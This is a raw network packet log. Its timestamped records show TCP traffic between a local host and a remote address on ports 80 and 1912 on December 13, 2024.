                                                                                                                                                                                                Dec 13, 2024 08:19:01.195014954 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.195146084 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.195302010 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.196505070 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.198925972 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.199991941 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.295695066 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.319832087 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.415415049 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:01.415513039 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.415565014 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:01.535285950 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743599892 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743619919 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743634939 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743649006 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743664980 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743679047 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743680000 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743701935 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743717909 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743726969 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743732929 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743748903 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743767023 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743797064 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.863626957 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.864186049 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.864258051 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.868002892 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.918143034 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.935245037 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.935359001 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.935425043 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.939368010 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.939512014 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.939563990 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.947846889 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.947860003 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.947906971 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.956103086 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.956403971 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.956471920 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.964591026 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.964642048 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.965117931 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.973074913 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.973093987 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.973149061 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.981342077 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.981771946 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.981867075 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.985304117 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.989728928 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.989787102 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.989876986 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:02.998049021 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.998122931 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:02.999104977 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.006465912 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.006531954 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.006603956 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.037959099 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.037970066 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.038028955 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.055421114 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.055433989 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.055486917 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.106029987 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.106136084 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.116261959 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.127432108 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.127450943 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.127532959 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.128611088 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.128803015 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.128849030 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.133488894 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.133506060 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.133579969 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.138219118 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.138406992 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.138468981 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.143265009 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.143279076 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.143341064 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.147968054 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.147980928 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.148056984 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.152652979 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.152667046 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.152712107 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.157195091 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.157520056 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.157612085 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.162066936 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.162425995 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.163300037 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.166851044 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.166927099 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.167031050 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.171690941 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.171710968 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.171763897 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.176306963 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.176388979 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.176652908 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.181123972 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.181310892 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.181413889 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.185905933 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.185920000 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.185972929 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.190035105 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.190049887 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.190104008 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.193556070 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.193571091 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.193634033 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.197422981 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.197437048 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.197488070 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.201205015 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.201221943 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.201293945 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.205419064 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.205431938 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.205514908 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.208918095 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.208937883 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.208986998 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.212646008 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.236013889 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.261888981 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.319767952 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.319786072 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.319889069 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.321046114 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.321152925 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.321217060 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.324140072 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.324151039 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.324336052 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.327438116 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.327449083 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.327505112 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.330514908 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.330524921 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.330581903 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.332809925 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.332820892 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.332889080 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.335419893 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.335561037 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.335772038 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.338121891 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.338814020 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.338867903 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.341169119 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.341181040 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.341250896 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.344568968 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.344580889 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.344645023 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.346277952 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.346332073 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.346379995 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.349864006 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.349875927 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.349951982 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.351640940 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.351737022 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.351795912 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.355169058 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.355180979 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.355232954 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.357142925 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.357399940 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.357494116 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.360656977 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.360667944 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.360717058 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.362437010 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.362503052 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.362590075 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.365653038 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.365664005 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.365708113 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.367708921 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.367796898 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.367851973 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.370963097 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.370975018 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.371030092 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.373117924 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.373188019 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.373260021 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.376369953 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.376382113 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.376444101 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.378540039 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.378673077 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.378717899 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.381007910 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.381705046 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.381755114 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.384655952 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.384665966 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.384723902 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.387243986 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.387254953 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.387335062 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.389154911 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.389611006 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.389672041 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.391788006 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.392168999 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.392224073 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.394490957 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.394567013 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.394783974 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.397212029 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.397289038 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.397346020 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.399941921 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.399952888 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.400012970 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.402740002 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.402750015 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.402798891 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.405457973 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.405669928 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.405730009 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.408008099 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.408231974 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.408274889 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.410636902 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.410779953 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.410819054 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.413382053 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.465023994 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.511697054 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.511998892 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.512061119 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.512990952 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.513286114 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.513303041 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.513350964 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.515611887 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.515630007 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.515688896 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.517839909 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.517898083 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.517920017 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.520090103 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.520117044 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.520172119 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.522396088 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.522413015 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.522449970 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.524394035 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.524475098 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.524502993 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.526453972 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.526506901 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.526542902 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.528775930 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.528794050 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.528827906 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.530632973 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.530689001 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.530808926 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.533014059 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.533030987 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.533061981 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.534802914 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.534832954 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.534882069 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.536696911 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.536783934 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.537997961 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.539007902 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.539025068 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.539056063 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.540782928 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.540801048 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.540833950 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.542681932 CET8049755185.81.68.147192.168.2.11
